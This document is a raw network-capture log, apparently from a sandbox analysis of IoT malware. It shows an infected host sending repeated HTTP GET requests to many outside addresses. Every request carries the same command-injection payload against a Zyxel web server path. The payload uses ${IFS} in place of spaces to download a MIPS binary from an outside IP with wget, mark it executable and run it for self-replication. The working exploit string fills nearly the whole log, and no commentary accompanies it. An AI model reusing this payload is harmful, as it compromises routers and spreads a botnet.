                                          Jan 14, 2024 15:46:34.402877092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8867192.168.2.2360922158.96.187.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402945995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8868192.168.2.2359622100.217.63.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402970076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8869192.168.2.2350310122.8.117.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403032064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8870192.168.2.234359840.122.60.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403055906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8871192.168.2.2353188150.29.120.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403100014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8872192.168.2.2358532205.43.226.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403139114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8873192.168.2.23358444.172.8.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403167009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8874192.168.2.233767463.41.163.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403197050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8875192.168.2.2350092120.116.205.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403230906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8876192.168.2.23553105.131.42.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403263092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8877192.168.2.2340452180.236.206.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403309107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8878192.168.2.2338188148.209.248.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403337002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8879192.168.2.2352198200.189.155.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403372049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8880192.168.2.234734463.156.22.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403430939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8881192.168.2.2357346165.223.108.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403460979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8882192.168.2.2346688181.241.181.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403486967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8883192.168.2.2359416190.175.219.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403544903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8884192.168.2.2359124135.6.15.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403594017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8885192.168.2.233499659.191.82.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403618097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8886192.168.2.233334245.58.172.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403672934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8887192.168.2.2333790112.226.86.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403690100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8888192.168.2.2336444186.155.109.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403763056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8889192.168.2.2342342195.127.215.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403789043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8890192.168.2.234281248.217.226.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403841972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8891192.168.2.2334166119.88.103.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403868914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8892192.168.2.2336028209.220.80.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403925896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8893192.168.2.234575053.83.7.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.403979063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8894192.168.2.235048498.107.105.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404010057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8895192.168.2.2338062100.152.84.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404056072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8896192.168.2.2340614146.114.127.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404077053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8897192.168.2.2352632140.26.16.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404110909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8898192.168.2.2353318217.148.59.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404155970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8899192.168.2.2351316206.126.247.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404206991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8900192.168.2.2353300209.243.159.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404249907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8901192.168.2.2344606176.66.195.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404304028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8902192.168.2.235574693.117.162.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404356956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8903192.168.2.2353196124.99.62.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404377937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8904192.168.2.235403691.179.218.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404418945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8905192.168.2.2336482116.201.88.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404442072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8906192.168.2.235372649.241.203.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404486895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8907192.168.2.2358146216.218.156.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404532909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8908192.168.2.23451682.89.85.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404570103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8909192.168.2.233386284.249.19.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404577017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8910192.168.2.2355832179.165.126.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404606104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8911192.168.2.233352049.63.233.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404663086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8912192.168.2.2351204208.247.198.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404681921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8913192.168.2.2359076102.130.210.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404732943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8914192.168.2.2346946160.120.164.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404772997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8915192.168.2.2336698176.138.114.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404793024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8916192.168.2.2343670168.198.51.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404829025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8917192.168.2.2346962210.221.155.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404860020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8918192.168.2.23407121.96.77.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404911995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8919192.168.2.2355144172.148.20.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.404954910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8920192.168.2.2357510124.210.81.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405006886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8921192.168.2.2355140177.227.124.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405035019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8922192.168.2.234830438.25.17.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405087948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8923192.168.2.2345208149.253.186.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405144930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8924192.168.2.234961214.115.118.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405199051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8925192.168.2.235064817.126.102.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405225039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8926192.168.2.235357074.177.6.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405251980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8927192.168.2.2340124185.141.248.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405299902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8928192.168.2.233828663.74.143.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.405324936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8929192.168.2.2337720165.177.22.156443
                                          TimestampBytes transferredDirectionData
